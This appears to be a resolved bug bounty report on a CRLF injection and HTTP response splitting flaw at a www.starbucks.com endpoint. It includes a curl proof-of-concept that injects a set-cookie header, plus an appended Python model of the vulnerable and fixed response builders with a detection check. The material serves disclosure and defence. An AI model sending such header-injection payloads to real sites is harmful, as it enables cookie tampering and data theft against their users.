CRLF injection on www.starbucks.com
Medium
Starbucks
Team Summary
Official summary from Starbucks
x3n0nn3p discovered the endpoint at www.starbucks.com/email-prospectt was affected by a CRLF injection / HTTP response splitting issue. @x3n0nn3p — thank you for reporting this vulnerability and for confirming the resolution.
Reported by
x3n0nn3p
Vulnerability Details
Technical details and impact analysis
The vulnerability allows setting arbitrary headers, and also enables response splitting which can then be exploited further.
POC:
curl -i 'https://www.starbucks.com/email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf?requesturl=/responsibility/global-report/policies' -d 'newsletter_signup_email=&newsletter_signup_zipcode=&newsletter_placement=footer' --http1.1
Screenshot Attached.
Regards
## Impact
Possible impacts include:
- Stealing authenticated information via Ajax request with injected CORS headers
- Application DOS using overly long Cookies, etc.
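Added example (not part of the report and not Starbucks' code): a small Python model of the response splitting the PoC above relies on, beside the corrected version. It assumes a hypothetical endpoint that percent-decodes the request path and reflects it into a Location header; how the real server built its response is not known beyond the curl command. The function names, the ORIGIN constant and the allowed-header set are assumptions made for the example.

```python
"""Response-splitting model for the CRLF injection described above.

Hypothetical server logic (assumption): the request path is percent-decoded
and echoed into a Location header without being validated.  The PoC path
from the report is reused as the sample input; the "?requesturl=..." query
string is dropped because this toy server only reflects the path.
"""
from urllib.parse import unquote

CRLF = "\r\n"
ORIGIN = "https://www.starbucks.com"          # assumed redirect target host
ALLOWED = {"location", "content-length"}      # headers this endpoint itself sets

# Path from the report's curl PoC (query string omitted).
POC_PATH = "/email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf"


def build_redirect_vulnerable(raw_path: str) -> bytes:
    """Vulnerable variant: %0d%0a is decoded to a real CR LF and written to the wire."""
    decoded = unquote(raw_path)
    head = (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + ORIGIN + decoded + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )
    return head.encode("utf-8")


class HeaderInjectionError(ValueError):
    """Raised when a header value contains a line terminator or NUL."""


def validate_header_value(value: str) -> str:
    """Reject CR, LF and NUL; none of them may appear inside a header field value."""
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjectionError(f"line terminator in header value: {value!r}")
    return value


def build_redirect_fixed(raw_path: str) -> bytes:
    """Fixed variant: validate the *decoded* value, since that is what reaches the wire."""
    decoded = validate_header_value(unquote(raw_path))
    head = (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + ORIGIN + decoded + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )
    return head.encode("utf-8")


def is_rejected(raw_path: str) -> bool:
    """True when the fixed builder refuses the path."""
    try:
        build_redirect_fixed(raw_path)
    except HeaderInjectionError:
        return True
    return False


def parse_response(raw: bytes) -> dict:
    """Minimal HTTP/1.1 response parser: status line, lowercased header list, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("utf-8").split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return {"status": lines[0], "headers": headers, "body": body}


def unexpected_headers(parsed: dict, allowed: set = ALLOWED) -> list:
    """Header names in the response that the endpoint never sets itself.

    Running this check on a real response to the PoC is how to confirm the
    split: an injected set-cookie shows up as a genuine header."""
    return [name for name, _ in parsed["headers"] if name not in allowed]


if __name__ == "__main__":
    vuln = parse_response(build_redirect_vulnerable(POC_PATH))
    print(vuln["headers"])          # injected set-cookie is now a real header
    print(vuln["body"][:24])        # attacker's "4t6uf" became the body; the
                                    # server's own Content-Length landed in it
    print(unexpected_headers(vuln)) # ['set-cookie']
    print(is_rejected(POC_PATH))    # True
```

The fix validates after percent-decoding rather than before, because an encoded `%0d%0a` is harmless until it is decoded; checking the raw path would miss double-encoded or framework-decoded variants.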
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
CRLF Injection